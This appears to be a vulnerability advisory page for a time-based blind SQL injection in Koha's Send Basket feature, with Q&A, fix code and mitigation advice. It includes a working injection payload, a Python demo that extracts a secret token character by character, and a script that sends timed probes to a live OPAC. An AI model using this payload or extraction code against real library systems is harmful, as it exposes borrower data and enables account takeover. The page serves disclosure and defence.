CVE-2024-36058
Time-Based SQL Injection in Koha Send Basket Allows Data Exposure
Publication date: 2026-04-07
Last updated on: 2026-04-09
Assigner: MITRE
Description
Affected Vendors & Products
| Vendor | Product | Affected versions |
|---|---|---|
| koha | koha | before 23.05.10 |
| koha | library | before 22.05.22 |
| koha | library | before 23.05.10 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability lets an authenticated, low-privilege OPAC user read data from the Koha database through a time-based blind SQL injection. Unauthorized exposure of borrower data is a confidentiality breach under data-protection regimes such as GDPR and HIPAA.
In particular, password reset tokens can be extracted and used to hijack other accounts, widening the disclosure. That compromises the confidentiality and integrity of personal data and can trigger the breach-notification obligations those regulations impose.
Can you explain this vulnerability to me?
CVE-2024-36058 is a time-based blind SQL injection in Koha Library Software before 22.05.22 and, on the 23.05 branch, before 23.05.10 (see the Affected Vendors & Products table above). It lies in the Send Basket feature at opac/opac-sendbasket.pl, in the bib_list POST parameter.
The bib_list value is used in an SQL query without proper sanitisation or parameter binding, so an authenticated, low-privilege library user can append SQL of their own. Because the query's results are not reflected in the response, the attacker injects a condition that pauses the database, for example with MySQL's SLEEP(), and observes the HTTP response time instead.
Each request therefore leaks one bit (did the delay occur or not), and by chaining conditions the attacker extracts data one character at a time without ever seeing the query output.
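The mechanism described above, as an added illustration that is not Koha's code: a small Python/sqlite3 reconstruction of a basket query that pastes a delimited list of record ids into `IN (...)`, next to a hardened version that validates every id and binds each one to its own placeholder. The table names, the seeded rows, the `reset_tokens` table and the `/` delimiter are all constructed for the demo (the page does not state the parameter's format). SQLite has no SLEEP(), so the blind oracle here is boolean (record 1 is returned or not) rather than time-based, but the injection slot is the same one the page's payload uses: the leading `1)` closes the `IN` list and `-- -` comments out the rest of the statement.

```python
import sqlite3
import string

# Character set the blind extraction will try, one position at a time.
ALPHABET = string.ascii_lowercase + string.digits + "-"


def make_demo_db():
    """Constructed stand-in for the library database (not Koha's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE biblio (biblionumber INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO biblio VALUES (?, ?)",
        [(1, "Record one"), (2, "Record two"), (3, "Record three")],
    )
    # Secret the attacker is after; table name and token value are made up.
    conn.execute("CREATE TABLE reset_tokens (borrowernumber INTEGER, token TEXT)")
    conn.execute("INSERT INTO reset_tokens VALUES (42, 'c0ffee-42')")
    return conn


def fetch_basket_vulnerable(conn, bib_list):
    """Vulnerable pattern: the request value is pasted straight into the IN (...) list."""
    sql = (
        "SELECT biblionumber, title FROM biblio "
        f"WHERE biblionumber IN ({bib_list}) ORDER BY biblionumber"
    )
    return conn.execute(sql).fetchall()


def fetch_basket_safe(conn, bib_list):
    """Hardened form: validate every id, then bind each one to its own placeholder.
    The '/' delimiter is an assumption about the parameter's format."""
    ids = []
    for token in filter(None, bib_list.split("/")):
        if not token.isdigit():
            raise ValueError(f"rejecting non-numeric biblionumber {token!r}")
        ids.append(int(token))
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = (
        "SELECT biblionumber, title FROM biblio "
        f"WHERE biblionumber IN ({placeholders}) ORDER BY biblionumber"
    )
    return conn.execute(sql, ids).fetchall()


def safe_rejects(conn, bib_list):
    """True if the hardened query refuses the value instead of executing it."""
    try:
        fetch_basket_safe(conn, bib_list)
    except ValueError:
        return True
    return False


def oracle(conn, condition):
    """Blind oracle: record 1 comes back only when the injected condition is true.
    On MySQL the same slot takes SLEEP() and the oracle becomes the response time."""
    payload = f"1) AND ({condition})-- -"
    return len(fetch_basket_vulnerable(conn, payload)) == 1


def blind_extract(conn, max_len=32):
    """Recover the stored token one character per position through the oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = f"(SELECT substr(token, {pos}, 1) FROM reset_tokens LIMIT 1) = '{ch}'"
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # nothing matched: end of the token
    return recovered


if __name__ == "__main__":
    db = make_demo_db()
    print(fetch_basket_vulnerable(db, "1) OR 1=1-- -"))  # every record, not just the basket
    print(blind_extract(db))                              # the token, never shown in any response
```

The hardened version makes two independent changes: it rejects anything that is not a record id before building the statement, and it never lets the value reach the SQL text at all. Either alone closes this hole; together they also give a clean place to log rejected values, which is the server-side signal the mitigation advice below relies on.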
How can this vulnerability impact me?
An authenticated user with low privileges can read data from the database, a bit or a character per request, by exploiting the time-based injection. Consequences include:
- Unauthorized access to sensitive information such as password reset tokens.
- Potential hijacking of other user accounts using stolen credentials or tokens.
- Exposure of confidential or private data stored in the database.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The vulnerability is confirmed by sending a crafted POST to opac-sendbasket.pl whose bib_list value makes the database sleep, and comparing the response time with that of a normal request.
For example, log in as an ordinary OPAC user, add a record to the basket, intercept the Send Basket request with a proxy such as Burp Suite, and replace the bib_list value with `1) AND (SELECT 1 FROM (SELECT(SLEEP(36)))x)-- -`. The leading `1)` closes the open parenthesis of the original query and the trailing `-- -` comments out whatever follows the injection point.
If the response takes roughly 36 seconds longer than the baseline request, the time-based blind SQL injection is present. In practice use a shorter sleep (5 to 10 seconds) and repeat the measurement a few times: a single long delay on a loaded server is also the symptom of an unrelated stall, whereas a delay that tracks the SLEEP argument is the convincing signal.
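A scripted form of the check described above, added here and not part of the original page. It times a baseline Send Basket request and a SLEEP probe, repeats both, and decides from the timings alone. The URL, the CGISESSID cookie value, the baseline bib_list value and the form's other fields are placeholders to be copied from the request captured in the proxy (the cookie name and the `EXTRA_FIELDS` dictionary are assumptions; the page lists only bib_list). The decision rule in `is_delayed` is this example's own heuristic, and a 5 second sleep repeated three times replaces the page's 36 seconds so that no single noisy sample decides the outcome.

```python
import socket
import time
import urllib.error
import urllib.parse
import urllib.request

# Placeholders (assumptions, not from the advisory): fill in from a Send Basket
# request captured in Burp while logged in with a low-privilege OPAC account.
OPAC_URL = "https://opac.example.org/cgi-bin/koha/opac-sendbasket.pl"
SESSION_COOKIE = "CGISESSID=replace-with-captured-session-id"  # assumed cookie name
BASELINE_BIB_LIST = "1"   # a legitimate basket value from the captured request
EXTRA_FIELDS = {}         # the form's other fields, copied verbatim from the capture


def build_payload(sleep_seconds):
    """The advisory's probe with the SLEEP() length parameterised."""
    return f"1) AND (SELECT 1 FROM (SELECT(SLEEP({sleep_seconds})))x)-- -"


def time_post(bib_list, timeout):
    """POST one bib_list value and return how long the server held the request."""
    body = urllib.parse.urlencode({**EXTRA_FIELDS, "bib_list": bib_list}).encode()
    req = urllib.request.Request(OPAC_URL, data=body, headers={"Cookie": SESSION_COOKIE})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # an error page still tells us when the query finished
    except (urllib.error.URLError, socket.timeout, TimeoutError):
        return timeout  # a hung or refused request is a stall, never a positive
    return time.monotonic() - start


def is_delayed(baseline, probes, sleep_seconds, margin=1.0):
    """Timing-only decision: every probe must land between (slowest baseline +
    sleep - margin) and (slowest baseline + 2 * sleep). Below the floor the
    SLEEP never ran; above the ceiling it is a timeout or server stall."""
    floor = max(baseline) + sleep_seconds - margin
    ceiling = max(baseline) + 2 * sleep_seconds
    return all(floor <= p <= ceiling for p in probes)


def check(sleep_seconds=5, rounds=3):
    """Measure baseline and probe timings and return (verdict, baseline, probes)."""
    timeout = 4 * sleep_seconds
    baseline = [time_post(BASELINE_BIB_LIST, timeout) for _ in range(rounds)]
    probes = [time_post(build_payload(sleep_seconds), timeout) for _ in range(rounds)]
    return is_delayed(baseline, probes, sleep_seconds), baseline, probes


if __name__ == "__main__":
    verdict, baseline, probes = check()
    print("baseline:", [round(t, 2) for t in baseline])
    print("probes:  ", [round(t, 2) for t in probes])
    print("time-based injection confirmed" if verdict else "no reliable delay observed")
```

Run it only against a system you are authorised to test; each probe ties up a database connection for the sleep interval, so keep `sleep_seconds` small and `rounds` low on a production OPAC.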
What immediate steps should I take to mitigate this vulnerability?
Upgrade Koha to 22.05.22 or later (or to 23.05.10 or later on the 23.05 branch, per the affected-versions table), where the issue is fixed.
Until the upgrade is done, limit who can reach the Send Basket feature: it requires a logged-in OPAC account, so reviewing which accounts can log in narrows the pool of possible attackers, and watch for unusual requests to opac-sendbasket.pl. On the database side, an injected SLEEP() shows up as a long-running query from the Koha application user in the process list or slow query log, a useful signal when the web server logs do not record POST bodies.
A web application firewall or input-validation proxy that rejects bib_list values containing anything other than record identifiers and separators is a reasonable stopgap; blocklists for the SLEEP or BENCHMARK keywords alone are easy to evade and should not be the only control.